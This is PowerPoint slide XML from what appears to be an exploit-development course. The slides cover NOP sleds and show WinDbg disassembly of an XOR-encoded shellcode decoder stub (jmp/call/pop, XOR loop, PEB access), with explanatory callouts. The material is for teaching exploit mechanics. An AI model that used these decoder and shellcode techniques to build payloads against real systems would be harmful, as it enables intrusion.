            <a:off x="1943805" y="1243471"/>
            <a:ext cx="1632056" cy="4992506"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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&lt;shellcode&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4275313" y="1243470"/>
            <a:ext cx="2020641" cy="4895058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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&lt;shellcode&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6917689" y="1243471"/>
            <a:ext cx="2020641" cy="4992506"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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&lt;shellcode&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Explosion 1 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710654" y="1321188"/>
            <a:ext cx="155434" cy="155434"/>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endParaRPr lang="en-US" sz="1836">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{211A7563-44BB-DBA9-3B5D-E6D9EB04166B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit Elements: NOP Sleds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365121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3.46945E-18 1.21387E-6 L 3.46945E-18 0.6437 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="322"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="7" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="16" end="16"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="16" end="16"/>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99239" y="1165755"/>
            <a:ext cx="9326033" cy="5857441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0:017&gt; u 0x0150f60b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f60b eb10            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     0150f61d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f60d 5a              pop     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</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0150f60e 4a              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</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0150f60f 33c9            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx,ecx</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0150f611 66b93c01        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     cx,13Ch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f615 80340a99        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx+ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>],99h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f619 e2fa            loop    0150f615</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f61b eb05            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     0150f622</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f61d e8ebffffff      call    0150f60d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f622 704c            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      0150f670</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f624 99              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cdq</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0150f625 99              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cdq</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0150f626 99              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cdq</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0150f627 c3              ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f628 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              std</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f629 38a999999912    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [ecx+12999999h],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ch</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="617427" y="5395292"/>
            <a:ext cx="2564659" cy="478376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2448" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Encoded Payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2099239" y="1787490"/>
            <a:ext cx="8548864" cy="414353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f60d 5a              pop     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2040" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2099239" y="3963564"/>
            <a:ext cx="8782015" cy="414353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f61d e8ebffffff      call    0150f60d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2099239" y="1476622"/>
            <a:ext cx="8548864" cy="414353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f60b eb10            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     0150f61d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Left Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8238877" y="4352148"/>
            <a:ext cx="544019" cy="233151"/>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endParaRPr lang="en-US" sz="1836">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8782898" y="3938003"/>
            <a:ext cx="1904017" cy="1054716"/>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rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="204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rPr>
              <a:t>Pushes return address on the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Left Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8161160" y="1942923"/>
            <a:ext cx="544019" cy="233151"/>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endParaRPr lang="en-US" sz="1836">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8705181" y="1528778"/>
            <a:ext cx="1904017" cy="1054716"/>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rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="204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rPr>
              <a:t>Pops return address into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040"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rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="204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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1341337" y="280105"/>
            <a:ext cx="10019032" cy="1165754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4488" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Curved Left Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8083444" y="1865206"/>
            <a:ext cx="466302" cy="2409225"/>
          </a:xfrm>
          <a:prstGeom prst="curved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endParaRPr lang="en-US" sz="1836">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2176956" y="4352148"/>
            <a:ext cx="8548864" cy="2564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36">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2196385" y="4371578"/>
            <a:ext cx="8490576" cy="2462534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f622 e9d5000000     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    0150f6fc </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f627 5a             pop    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2040" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0150f628 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>64a130000000   mov    eax,dword ptr fs:[0000030h]</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:endParaRPr lang="en-US" sz="2040" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:endParaRPr lang="en-US" sz="2040" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
